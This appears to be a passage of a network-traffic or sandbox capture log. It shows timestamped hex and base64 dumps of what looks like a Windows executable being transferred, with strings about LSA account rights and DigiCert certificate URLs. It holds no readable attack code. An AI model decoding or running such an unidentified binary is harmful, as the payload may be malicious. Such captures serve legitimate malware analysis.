                                                                  2023-04-26 07:00:13 UTC496INData Raw: 55 67 41 41 41 48 55 41 63 67 41 74 41 46 41 41 53 77 41 41 41 47 6b 41 5a 41 41 74 41 45 6b 41 52 41 41 41 41 48 55 41 61 77 41 74 41 46 55 41 51 51 41 41 41 47 49 41 20 5a 51 41 74 41 45 49 41 57 51 41 41 41 48 4d 41 62 41 41 74 41 46 4d 41 53 51 41 41 41 47 55 41 64 41 41 74 41 45 55 41 52 51 41 41 41 47 77 41 64 67 41 74 41 45 77 41 56 67 41 41 41 47 77 41 64 41 41 74 41 45 77 41 56 41 41 41 20 41 47 59 41 59 51 41 74 41 45 6b 41 55 67 41 41 41 48 59 41 61 51 41 74 41 46 59 41 54 67 41 41 41 47 67 41 65 51 41 74 41 45 45 41 54 51 41 41 41 47 45 41 65 67 41 74 41 45 45 41 57 67 41 74 41 45 77 41 59 51 42 30 41 47 34 41 20 41 41 41 41 41 47 55 41 64 51 41 74 41 45 55 41 55 77 41 41 41 47 30 41 61 77 41 74 41 45 30 41 53 77 41 41 41 48 51 41 62 67 41 74
                                                                  Data Ascii: UgAAAHUAcgAtAFAASwAAAGkAZAAtAEkARAAAAHUAawAtAFUAQQAAAGIA ZQAtAEIAWQAAAHMAbAAtAFMASQAAAGUAdAAtAEUARQAAAGwAdgAtAEwAVgAAAGwAdAAtAEwAVAAA AGYAYQAtAEkAUgAAAHYAaQAtAFYATgAAAGgAeQAtAEEATQAAAGEAegAtAEEAWgAtAEwAYQB0AG4A AAAAAGUAdQAtAEUAUwAAAG0AawAtAE0ASwAAAHQAbgAt
                                                                  2023-04-26 07:00:13 UTC512INData Raw: 42 41 45 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 4e 41 45 49 41 58 77 42 54 41 46 6b 41 55 77 42 55 41 45 55 41 54 51 42 4e 20 41 45 38 41 52 41 42 42 41 45 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 45 30 41 51 67 42 66 41 46 51 41 51 51 42 54 41 45 73 41 54 51 42 50 41 45 51 41 20 51 51 42 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 54 51 42 43 41 46 38 41 52 41 42 46 41 45 59 41 51 51 42 56 41 45 77 41 56 41 42 66 20 41 45 51 41 52 51 42 54 41 45 73 41 56 41 42 50 41 46 41 41 58 77 42 50 41 45 34
                                                                  Data Ascii: BAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABNAEIAXwBTAFkAUwBUAEUATQBN AE8ARABBAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAE0AQgBfAFQAQQBTAEsATQBPAEQA QQBMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAATQBCAF8ARABFAEYAQQBVAEwAVABf AEQARQBTAEsAVABPAFAAXwBPAE4
                                                                  2023-04-26 07:00:13 UTC528INData Raw: 41 64 51 42 79 41 47 6b 41 64 41 42 35 20 41 43 41 41 63 41 42 76 41 47 77 41 61 51 42 6a 41 48 6b 41 49 41 42 6d 41 47 38 41 63 67 41 67 41 48 51 41 61 41 42 70 41 48 4d 41 49 41 42 68 41 47 4d 41 59 77 42 76 41 48 55 41 62 67 42 30 41 43 41 41 4c 67 41 75 41 43 34 41 20 41 41 41 41 41 41 41 41 41 41 42 4d 41 46 4d 41 51 51 41 67 41 47 45 41 5a 41 42 6b 41 43 41 41 59 51 42 6a 41 47 4d 41 62 77 42 31 41 47 34 41 64 41 41 67 41 48 49 41 61 51 42 6e 41 47 67 41 64 41 42 7a 41 43 41 41 63 67 42 6c 20 41 48 51 41 64 51 42 79 41 47 34 41 49 41 42 6a 41 47 38 41 5a 41 42 6c 41 44 6f 41 49 41 41 41 41 41 41 41 54 41 42 54 41 45 45 41 49 41 42 6a 41 47 77 41 62 77 42 7a 41 47 55 41 49 41 42 77 41 47 38 41 62 41 42 70 41 47 4d 41 20 65 51 41 67 41 43 34 41 4c 67
                                                                  Data Ascii: AdQByAGkAdAB5 ACAAcABvAGwAaQBjAHkAIABmAG8AcgAgAHQAaABpAHMAIABhAGMAYwBvAHUAbgB0ACAALgAuAC4A AAAAAAAAAABMAFMAQQAgAGEAZABkACAAYQBjAGMAbwB1AG4AdAAgAHIAaQBnAGgAdABzACAAcgBl AHQAdQByAG4AIABjAG8AZABlADoAIAAAAAAATABTAEEAIABjAGwAbwBzAGUAIABwAG8AbABpAGMA eQAgAC4ALg
                                                                  2023-04-26 07:00:13 UTC544INData Raw: 49 44 45 41 4d 41 41 41 44 37 6b 67 4d 51 42 41 41 41 41 41 4f 54 41 78 41 45 41 41 41 41 20 43 35 4d 44 45 41 59 41 41 41 41 54 6b 77 4d 51 42 77 41 41 41 42 75 54 41 78 41 49 41 41 41 41 49 35 4d 44 45 41 6b 41 41 41 41 72 6b 77 4d 51 43 67 41 41 41 44 4f 54 41 78 41 4c 41 41 41 41 4f 35 4d 44 45 41 77 41 41 41 42 44 20 6b 77 4d 51 44 51 41 41 41 45 75 54 41 78 41 4f 41 41 41 41 55 35 4d 44 45 41 38 41 41 41 42 65 6b 77 4d 51 45 41 41 41 41 47 61 54 41 78 41 52 41 41 41 41 63 5a 4d 44 45 42 49 41 41 41 42 35 6b 77 4d 51 45 77 41 41 41 49 47 54 20 41 78 41 55 41 41 41 41 69 5a 4d 44 45 42 55 41 41 41 43 55 6b 77 4d 51 46 67 41 41 41 4a 79 54 41 78 41 56 41 41 41 41 6e 4a 4d 44 45 41 41 41 41 41 44 72 6b 67 4d 51 49 67 57 54 47 51 45 41 41 41 44 63 4d 51
                                                                  Data Ascii: IDEAMAAAD7kgMQBAAAAAOTAxAEAAAA C5MDEAYAAAATkwMQBwAAABuTAxAIAAAAI5MDEAkAAAArkwMQCgAAADOTAxALAAAAO5MDEAwAAABD kwMQDQAAAEuTAxAOAAAAU5MDEA8AAABekwMQEAAAAGaTAxARAAAAcZMDEBIAAAB5kwMQEwAAAIGT AxAUAAAAiZMDEBUAAACUkwMQFgAAAJyTAxAVAAAAnJMDEAAAAADrkgMQIgWTGQEAAADcMQ
                                                                  2023-04-26 07:00:13 UTC560INData Raw: 41 41 41 68 47 41 46 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 2f 2f 2f 2f 39 41 20 78 77 4d 51 41 41 41 41 41 45 6a 48 41 78 41 41 41 41 41 41 55 4d 63 44 45 43 49 46 6b 78 6b 44 41 41 41 41 77 47 41 46 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 2f 2f 20 2f 2f 2b 51 78 77 4d 51 41 41 41 41 41 4a 6a 48 41 78 41 42 41 41 41 41 6f 4d 63 44 45 43 49 46 6b 78 6b 45 41 41 41 41 2f 47 41 46 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 50 2f 2f 2f 2f 2f 67 78 77 4d 51 41 41 41 41 41 4f 6a 48 41 78 44 2f 2f 2f 2f 2f 38 4d 63 44 45 41 49 41 41 41 44 34 78 77 4d 51 41 41 41 41 41 43 49 46 6b
                                                                  Data Ascii: AAAhGAFEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////9A xwMQAAAAAEjHAxAAAAAAUMcDECIFkxkDAAAAwGAFEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP// //+QxwMQAAAAAJjHAxABAAAAoMcDECIFkxkEAAAA/GAFEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AP/////gxwMQAAAAAOjHAxD/////8McDEAIAAAD4xwMQAAAAACIFk
                                                                  2023-04-26 07:00:13 UTC576INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 57 4a 49 46 45 4a 69 53 42 52 44 59 6b 67 55 51 57 4a 4d 46 45 41 45 41 41 41 44 2b 2f 2f 2f 2f 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 41 41 41 41 41 20 41 41 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67
                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAWJIFEJiSBRDYkgUQWJMFEAEAAAD+////AAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAAAAA AAAgICAgICAgICAgICAgICAgICAgICAgICAg
                                                                  2023-04-26 07:00:13 UTC592INData Raw: 4e 6e 67 32 20 6f 7a 61 2b 4e 67 63 33 45 44 63 5a 4e 79 49 33 54 54 64 76 4e 35 4d 33 30 44 66 63 4f 49 6b 35 4e 44 71 6c 4f 67 63 37 68 6a 75 38 4f 77 6f 38 6f 6a 7a 69 50 4c 59 2b 36 54 37 2b 50 67 38 2f 65 54 2b 50 50 39 34 2f 2b 6a 38 41 20 41 41 42 51 41 77 43 41 41 41 41 41 48 44 42 75 4d 4b 34 77 41 44 46 61 4d 57 59 79 70 6a 4c 67 4d 68 55 7a 4e 54 4e 41 4d 30 34 7a 32 54 4d 4b 4e 43 6b 30 4f 7a 52 46 4e 47 63 30 69 44 54 31 4e 42 73 31 51 6a 56 6a 4e 64 34 31 20 42 44 59 72 4e 6b 6f 32 42 6a 63 32 4e 31 41 33 67 7a 65 67 4e 37 38 33 6d 44 67 59 4f 59 63 35 6b 54 6e 6c 4f 53 49 36 51 54 70 4e 4f 75 49 38 54 54 31 6e 50 58 51 39 70 44 33 49 50 64 4d 39 34 44 33 79 50 54 6f 2b 55 7a 37 58 20 50 75 77 2b 39 54 37 2b 50 6b 67 2f 55 6a 39 38 50 77 41
                                                                  Data Ascii: Nng2 oza+Ngc3EDcZNyI3TTdvN5M30DfcOIk5NDqlOgc7hju8Owo8ojziPLY+6T7+Pg8/eT+PP94/+j8A AABQAwCAAAAAHDBuMK4wADFaMWYypjLgMhUzNTNAM04z2TMKNCk0OzRFNGc0iDT1NBs1QjVjNd41 BDYrNko2Bjc2N1A3gzegN783mDgYOYc5kTnlOSI6QTpNOuI8TT1nPXQ9pD3IPdM94D3yPTo+Uz7X Puw+9T7+Pkg/Uj98PwA
                                                                  2023-04-26 07:00:13 UTC608INData Raw: 46 42 51 63 42 41 51 52 35 4d 48 63 77 4a 41 59 49 4b 77 59 42 20 42 51 55 48 4d 41 47 47 47 47 68 30 64 48 41 36 4c 79 39 76 59 33 4e 77 4c 6d 52 70 5a 32 6c 6a 5a 58 4a 30 4c 6d 4e 76 62 54 42 50 42 67 67 72 42 67 45 46 42 51 63 77 41 6f 5a 44 61 48 52 30 63 44 6f 76 4c 32 4e 68 59 32 56 79 20 64 48 4d 75 5a 47 6c 6e 61 57 4e 6c 63 6e 51 75 59 32 39 74 4c 30 52 70 5a 32 6c 44 5a 58 4a 30 55 30 68 42 4d 6b 46 7a 63 33 56 79 5a 57 52 4a 52 46 52 70 62 57 56 7a 64 47 46 74 63 47 6c 75 5a 30 4e 42 4c 6d 4e 79 64 44 41 4e 20 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 73 46 41 41 4f 43 41 51 45 41 53 42 7a 63 74 65 6d 61 49 37 7a 6e 47 75 63 67 44 6f 35 6e 52 76 31 43 63 6c 46 30 43 69 4e 48 6f 36 75 53 30 69 58 45 63 46 6d 2b 46 4b 44 6c 4a 34 47 6c 20 54 52
                                                                  Data Ascii: FBQcBAQR5MHcwJAYIKwYB BQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBPBggrBgEFBQcwAoZDaHR0cDovL2NhY2Vy dHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0U0hBMkFzc3VyZWRJRFRpbWVzdGFtcGluZ0NBLmNydDAN BgkqhkiG9w0BAQsFAAOCAQEASBzctemaI7znGucgDo5nRv1CclF0CiNHo6uS0iXEcFm+FKDlJ4Gl TR
                                                                  2023-04-26 07:00:13 UTC624INData Raw: 42 37 43 51 41 41 66 41 6b 41 41 48 30 4a 41 41 42 2b 43 51 41 41 66 77 6b 41 41 49 41 4a 41 41 43 42 43 51 41 41 20 67 67 6b 41 41 49 4d 4a 41 41 43 45 43 51 41 41 68 51 6b 41 41 49 59 4a 41 41 43 48 43 51 41 41 69 41 6b 41 41 49 6b 4a 41 41 43 4b 43 51 41 41 69 77 6b 41 41 49 77 4a 41 41 43 4e 43 51 41 41 6a 67 6b 41 41 49 38 4a 41 41 43 51 20 43 51 41 41 6b 51 6b 41 41 4a 49 4a 41 41 43 54 43 51 41 41 6c 41 6b 41 41 4a 55 4a 41 41 43 57 43 51 41 41 6c 77 6b 41 41 4a 67 4a 41 41 43 5a 43 51 41 41 6d 67 6b 41 41 4a 73 4a 41 41 43 63 43 51 41 41 6e 51 6b 41 41 4a 34 4a 20 41 41 43 66 43 51 41 41 6f 41 6b 41 41 4b 45 4a 41 41 43 69 43 51 41 41 6f 77 6b 41 41 4b 51 4a 41 41 43 6c 43 51 41 41 70 67 6b 41 41 4b 63 4a 41 41 43 6f 43 51 41 41 71 51 6b 41 41 4b
                                                                  Data Ascii: B7CQAAfAkAAH0JAAB+CQAAfwkAAIAJAACBCQAA ggkAAIMJAACECQAAhQkAAIYJAACHCQAAiAkAAIkJAACKCQAAiwkAAIwJAACNCQAAjgkAAI8JAACQ CQAAkQkAAJIJAACTCQAAlAkAAJUJAACWCQAAlwkAAJgJAACZCQAAmgkAAJsJAACcCQAAnQkAAJ4J AACfCQAAoAkAAKEJAACiCQAAowkAAKQJAAClCQAApgkAAKcJAACoCQAAqQkAAK
                                                                  2023-04-26 07:00:13 UTC640INData Raw: 77 41 41 69 77 48 2f 55 41 79 44 77 42 43 6a 66 4f 49 4c 45 4d 5a 46 2f 45 54 6f 73 47 49 43 41 49 76 49 68 63 6b 50 68 4a 38 44 41 41 43 4c 41 66 39 51 44 49 50 41 20 45 4b 4f 41 34 67 73 51 78 6b 58 38 52 75 69 51 59 67 49 41 69 38 69 46 79 51 2b 45 66 77 4d 41 41 49 73 42 2f 31 41 4d 67 38 41 51 6f 34 54 69 43 78 44 47 52 66 78 49 78 77 57 49 34 67 73 51 41 41 41 41 41 4d 63 46 6a 4f 49 4c 20 45 41 41 41 41 41 44 6f 58 47 49 43 41 49 76 49 68 63 6b 50 68 45 73 44 41 41 43 4c 41 66 39 51 44 49 50 41 45 4b 4f 51 34 67 73 51 78 6b 58 38 53 62 6d 51 34 67 73 51 61 47 44 36 43 52 44 6f 63 6d 55 43 41 49 54 41 64 52 46 71 20 48 6d 68 67 2b 67 6b 51 75 5a 44 69 43 78 44 6f 7a 57 67 43 41 4d 5a 46 2f 45 72 6f 46 47 49 43 41 49 76 49 68 63 6b 50 68 41 4d 44 41
                                                                  Data Ascii: wAAiwH/UAyDwBCjfOILEMZF/ETosGICAIvIhckPhJ8DAACLAf9QDIPA EKOA4gsQxkX8RuiQYgIAi8iFyQ+EfwMAAIsB/1AMg8AQo4TiCxDGRfxIxwWI4gsQAAAAAMcFjOIL EAAAAADoXGICAIvIhckPhEsDAACLAf9QDIPAEKOQ4gsQxkX8SbmQ4gsQaGD6CRDocmUCAITAdRFq Hmhg+gkQuZDiCxDozWgCAMZF/EroFGICAIvIhckPhAMDA
                                                                  2023-04-26 07:00:13 UTC656INData Raw: 38 41 73 51 78 6b 58 38 4a 62 6b 63 38 41 73 51 61 47 69 6e 43 52 44 6f 6b 6a 59 43 41 49 54 41 64 52 46 71 41 47 68 6f 70 77 6b 51 75 52 7a 77 43 78 44 6f 37 54 6b 43 41 4d 5a 46 2f 43 62 6f 4e 44 4d 43 41 49 76 49 20 68 63 6b 50 68 46 49 56 41 41 43 4c 41 66 39 51 44 49 50 41 45 4b 4d 67 38 41 73 51 78 6b 58 38 4a 37 6b 67 38 41 73 51 61 42 6a 39 43 52 44 6f 53 6a 59 43 41 49 54 41 64 52 46 71 42 32 67 59 2f 51 6b 51 75 53 44 77 43 78 44 6f 20 70 54 6b 43 41 4d 5a 46 2f 43 6a 6f 37 44 49 43 41 49 76 49 68 63 6b 50 68 41 6f 56 41 41 43 4c 41 66 39 51 44 49 50 41 45 4b 4d 6b 38 41 73 51 78 6b 58 38 4b 6d 70 59 61 67 42 6f 4b 50 41 4c 45 4f 6a 44 4e 67 55 41 67 38 51 49 20 75 67 4d 41 41 41 43 35 4c 50 41 4c 45 4f 67 68 6b 51 4d 41 67 38 51 45 78 6b 58 38
                                                                  Data Ascii: 8AsQxkX8Jbkc8AsQaGinCRDokjYCAITAdRFqAGhopwkQuRzwCxDo7TkCAMZF/CboNDMCAIvI hckPhFIVAACLAf9QDIPAEKMg8AsQxkX8J7kg8AsQaBj9CRDoSjYCAITAdRFqB2gY/QkQuSDwCxDo pTkCAMZF/Cjo7DICAIvIhckPhAoVAACLAf9QDIPAEKMk8AsQxkX8KmpYagBoKPALEOjDNgUAg8QI ugMAAAC5LPALEOghkQMAg8QExkX8
                                                                  2023-04-26 07:00:13 UTC672INData Raw: 44 42 42 6f 43 41 59 4b 45 4f 67 37 20 42 77 49 41 68 4d 42 31 45 57 6f 7a 61 41 67 47 43 68 43 35 55 41 45 4d 45 4f 69 57 43 67 49 41 78 6b 58 38 57 65 6a 64 41 77 49 41 69 38 69 46 79 51 2b 45 74 51 4d 41 41 49 73 42 2f 31 41 4d 67 38 41 51 6f 31 51 42 44 42 44 47 20 52 66 78 62 36 4c 30 44 41 67 43 4c 79 49 58 4a 44 34 53 56 41 77 41 41 69 77 48 2f 55 41 79 44 77 42 43 6a 57 41 45 4d 45 4d 5a 46 2f 46 33 6f 6e 51 4d 43 41 49 76 49 68 63 6b 50 68 48 55 44 41 41 43 4c 41 66 39 51 44 49 50 41 20 45 4b 4e 63 41 51 77 51 78 6b 58 38 58 2b 68 39 41 77 49 41 69 38 69 46 79 51 2b 45 56 51 4d 41 41 49 73 42 2f 31 41 4d 67 38 41 51 6f 32 41 42 44 42 44 47 52 66 78 68 61 6c 68 71 41 47 68 6b 41 51 77 51 36 46 51 48 42 51 43 44 20 78 41 69 36 41 77 41 41 41 4c 6c
                                                                  Data Ascii: DBBoCAYKEOg7 BwIAhMB1EWozaAgGChC5UAEMEOiWCgIAxkX8WejdAwIAi8iFyQ+EtQMAAIsB/1AMg8AQo1QBDBDG Rfxb6L0DAgCLyIXJD4SVAwAAiwH/UAyDwBCjWAEMEMZF/F3onQMCAIvIhckPhHUDAACLAf9QDIPA EKNcAQwQxkX8X+h9AwIAi8iFyQ+EVQMAAIsB/1AMg8AQo2ABDBDGRfxhalhqAGhkAQwQ6FQHBQCD xAi6AwAAALl
                                                                  2023-04-26 07:00:13 UTC688INData Raw: 44 78 41 54 47 52 66 77 37 78 77 57 4d 44 51 77 51 70 4f 77 4a 45 4d 63 46 6b 41 30 4d 20 45 41 49 41 41 41 44 6f 68 39 51 42 41 49 76 49 68 63 6b 50 68 4c 45 47 41 41 43 4c 41 66 39 51 44 49 50 41 45 4b 4f 55 44 51 77 51 78 6b 58 38 50 4c 6d 55 44 51 77 51 61 42 41 49 43 68 44 6f 6e 64 63 42 41 49 54 41 64 52 46 71 20 50 6d 67 51 43 41 6f 51 75 5a 51 4e 44 42 44 6f 2b 4e 6f 42 41 4d 5a 46 2f 44 33 6f 50 39 51 42 41 49 76 49 68 63 6b 50 68 47 6b 47 41 41 43 4c 41 66 39 51 44 49 50 41 45 4b 4f 59 44 51 77 51 78 6b 58 38 50 72 6d 59 44 51 77 51 20 61 4b 54 73 43 52 44 6f 56 64 63 42 41 49 54 41 64 52 46 71 41 32 69 6b 37 41 6b 51 75 5a 67 4e 44 42 44 6f 73 4e 6f 42 41 4d 5a 46 2f 44 2f 6f 39 39 4d 42 41 49 76 49 68 63 6b 50 68 43 45 47 41 41 43 4c 41 66 39
                                                                  Data Ascii: DxATGRfw7xwWMDQwQpOwJEMcFkA0M EAIAAADoh9QBAIvIhckPhLEGAACLAf9QDIPAEKOUDQwQxkX8PLmUDQwQaBAIChDondcBAITAdRFq PmgQCAoQuZQNDBDo+NoBAMZF/D3oP9QBAIvIhckPhGkGAACLAf9QDIPAEKOYDQwQxkX8PrmYDQwQ aKTsCRDoVdcBAITAdRFqA2ik7AkQuZgNDBDosNoBAMZF/D/o99MBAIvIhckPhCEGAACLAf9
                                                                  2023-04-26 07:00:13 UTC704INData Raw: 42 6f 71 41 67 4b 45 4f 68 38 71 41 45 41 68 4d 42 31 45 57 6f 70 61 4b 67 49 43 68 43 35 4f 42 59 4d 45 4f 6a 58 71 77 45 41 78 30 58 38 20 41 51 41 41 41 4f 67 62 70 51 45 41 69 38 69 46 79 51 2b 45 4e 42 45 41 41 49 73 42 2f 31 41 4d 67 38 41 51 6f 7a 77 57 44 42 44 47 52 66 77 43 75 54 77 57 44 42 42 6f 2f 4f 77 4a 45 4f 67 78 71 41 45 41 68 4d 42 31 45 57 6f 43 20 61 50 7a 73 43 52 43 35 50 42 59 4d 45 4f 69 4d 71 77 45 41 78 6b 58 38 41 2b 6a 54 70 41 45 41 69 38 69 46 79 51 2b 45 37 42 41 41 41 49 73 42 2f 31 41 4d 67 38 41 51 6f 30 41 57 44 42 44 47 52 66 77 46 36 4c 4f 6b 41 51 43 4c 20 79 49 58 4a 44 34 54 4d 45 41 41 41 69 77 48 2f 55 41 79 44 77 42 43 6a 52 42 59 4d 45 4d 5a 46 2f 41 66 6f 6b 36 51 42 41 49 76 49 68 63 6b 50 68 4b 77 51 41 41
                                                                  Data Ascii: BoqAgKEOh8qAEAhMB1EWopaKgIChC5OBYMEOjXqwEAx0X8 AQAAAOgbpQEAi8iFyQ+ENBEAAIsB/1AMg8AQozwWDBDGRfwCuTwWDBBo/OwJEOgxqAEAhMB1EWoC aPzsCRC5PBYMEOiMqwEAxkX8A+jTpAEAi8iFyQ+E7BAAAIsB/1AMg8AQo0AWDBDGRfwF6LOkAQCL yIXJD4TMEAAAiwH/UAyDwBCjRBYMEMZF/Afok6QBAIvIhckPhKwQAA
                                                                  2023-04-26 07:00:13 UTC720INData Raw: 4d 42 31 45 57 6f 38 61 48 67 4c 43 68 43 35 71 43 55 4d 45 4f 69 43 66 41 45 41 78 6b 58 38 4c 65 6a 4a 64 51 45 41 68 63 41 50 68 4b 34 41 41 41 43 4c 45 49 76 49 2f 31 49 4d 67 38 41 51 20 6f 36 77 6c 44 42 44 47 52 66 77 76 36 4b 6c 31 41 51 43 46 77 41 2b 45 6a 67 41 41 41 49 73 51 69 38 6a 2f 55 67 79 44 77 42 43 6a 73 43 55 4d 45 4d 5a 46 2f 44 48 6f 69 58 55 42 41 49 58 41 64 48 4b 4c 45 49 76 49 2f 31 49 4d 20 67 38 41 51 6f 37 51 6c 44 42 44 47 52 66 77 7a 36 47 31 31 41 51 43 46 77 48 52 57 69 78 43 4c 79 50 39 53 44 49 50 41 45 4b 4f 34 4a 51 77 51 78 6b 58 38 4e 57 70 59 61 67 42 6f 76 43 55 4d 45 4f 68 49 65 51 51 41 67 38 51 49 20 75 67 4d 41 41 41 43 35 77 43 55 4d 45 4f 69 6d 30 77 49 41 78 30 58 38 2f 2f 2f 2f 2f 32 69 67 35 77 67 51 36
                                                                  Data Ascii: MB1EWo8aHgLChC5qCUMEOiCfAEAxkX8LejJdQEAhcAPhK4AAACLEIvI/1IMg8AQ o6wlDBDGRfwv6Kl1AQCFwA+EjgAAAIsQi8j/UgyDwBCjsCUMEMZF/DHoiXUBAIXAdHKLEIvI/1IM g8AQo7QlDBDGRfwz6G11AQCFwHRWixCLyP9SDIPAEKO4JQwQxkX8NWpYagBovCUMEOhIeQQAg8QI ugMAAAC5wCUMEOim0wIAx0X8/////2ig5wgQ6
                                                                  2023-04-26 07:00:13 UTC736INData Raw: 31 41 4d 20 67 38 41 51 6f 34 67 72 44 42 44 47 52 66 77 6e 36 48 4a 47 41 51 43 4c 79 49 58 4a 44 34 54 32 43 51 41 41 69 77 48 2f 55 41 79 44 77 42 43 6a 6a 43 73 4d 45 4d 5a 46 2f 43 6e 48 42 5a 41 72 44 42 41 41 41 41 41 41 78 30 58 38 20 4b 67 41 41 41 4d 63 46 6c 43 73 4d 45 50 7a 75 43 52 44 48 42 5a 67 72 44 42 41 48 41 41 41 41 36 43 31 47 41 51 43 4c 79 49 58 4a 44 34 53 78 43 51 41 41 69 77 48 2f 55 41 79 44 77 42 43 6a 6e 43 73 4d 45 4d 5a 46 2f 43 75 35 20 6e 43 73 4d 45 47 6a 6f 46 51 6f 51 36 45 4e 4a 41 51 43 45 77 48 55 52 61 6a 31 6f 36 42 55 4b 45 4c 6d 63 4b 77 77 51 36 4a 35 4d 41 51 44 47 52 66 77 73 36 4f 56 46 41 51 43 4c 79 49 58 4a 44 34 52 70 43 51 41 41 69 77 48 2f 20 55 41 79 44 77 42 43 6a 6f 43 73 4d 45 4d 5a 46 2f 43 32 35
                                                                  Data Ascii: 1AM g8AQo4grDBDGRfwn6HJGAQCLyIXJD4T2CQAAiwH/UAyDwBCjjCsMEMZF/CnHBZArDBAAAAAAx0X8 KgAAAMcFlCsMEPzuCRDHBZgrDBAHAAAA6C1GAQCLyIXJD4SxCQAAiwH/UAyDwBCjnCsMEMZF/Cu5 nCsMEGjoFQoQ6ENJAQCEwHURaj1o6BUKELmcKwwQ6J5MAQDGRfws6OVFAQCLyIXJD4RpCQAAiwH/ UAyDwBCjoCsMEMZF/C25
                                                                  2023-04-26 07:00:13 UTC752INData Raw: 41 51 43 45 77 48 55 52 61 67 42 6f 61 4b 63 4a 45 4c 6b 59 20 4d 51 77 51 36 4c 34 64 41 51 44 47 52 66 79 63 36 41 55 58 41 51 43 4c 79 49 58 4a 44 34 53 5a 41 51 41 41 69 77 48 2f 55 41 79 44 77 42 43 6a 48 44 45 4d 45 4d 5a 46 2f 4a 32 35 48 44 45 4d 45 47 68 6f 70 77 6b 51 36 42 73 61 20 41 51 43 45 77 48 55 52 61 67 42 6f 61 4b 63 4a 45 4c 6b 63 4d 51 77 51 36 48 59 64 41 51 44 47 52 66 79 65 36 4c 30 57 41 51 43 4c 79 49 58 4a 44 34 52 52 41 51 41 41 69 77 48 2f 55 41 79 44 77 42 43 6a 49 44 45 4d 45 4d 5a 46 20 2f 4a 2b 35 49 44 45 4d 45 47 68 6f 70 77 6b 51 36 4e 4d 5a 41 51 43 45 77 48 55 52 61 67 42 6f 61 4b 63 4a 45 4c 6b 67 4d 51 77 51 36 43 34 64 41 51 44 47 52 66 79 67 78 67 55 6b 4d 51 77 51 41 63 5a 46 2f 4b 48 48 42 53 67 78 20 44 42 41
                                                                  Data Ascii: AQCEwHURagBoaKcJELkY MQwQ6L4dAQDGRfyc6AUXAQCLyIXJD4SZAQAAiwH/UAyDwBCjHDEMEMZF/J25HDEMEGhopwkQ6Bsa AQCEwHURagBoaKcJELkcMQwQ6HYdAQDGRfye6L0WAQCLyIXJD4RRAQAAiwH/UAyDwBCjIDEMEMZF /J+5IDEMEGhopwkQ6NMZAQCEwHURagBoaKcJELkgMQwQ6C4dAQDGRfygxgUkMQwQAcZF/KHHBSgx DBA
                                                                  2023-04-26 07:00:13 UTC768INData Raw: 46 79 51 2b 45 75 77 38 41 41 49 73 42 2f 31 41 4d 67 38 41 51 6f 39 67 32 44 42 44 47 52 66 77 64 75 64 67 32 20 44 42 42 6f 61 4b 63 4a 45 4f 6a 64 36 67 41 41 68 4d 42 31 45 57 6f 41 61 47 69 6e 43 52 43 35 32 44 59 4d 45 4f 67 34 37 67 41 41 78 6b 58 38 48 73 59 46 33 44 59 4d 45 41 48 47 52 66 77 66 78 77 58 67 4e 67 77 51 42 77 41 41 20 41 4f 68 71 35 77 41 41 69 38 69 46 79 51 2b 45 58 67 38 41 41 49 73 42 2f 31 41 4d 67 38 41 51 6f 2b 51 32 44 42 44 47 52 66 77 67 75 65 51 32 44 42 42 6f 6b 43 6f 4b 45 4f 69 41 36 67 41 41 68 4d 42 31 45 57 70 4b 61 4a 41 71 20 43 68 43 35 35 44 59 4d 45 4f 6a 62 37 51 41 41 78 6b 58 38 49 65 67 69 35 77 41 41 69 38 69 46 79 51 2b 45 46 67 38 41 41 49 73 42 2f 31 41 4d 67 38 41 51 6f 2b 67 32 44 42 44 47 52 66 77
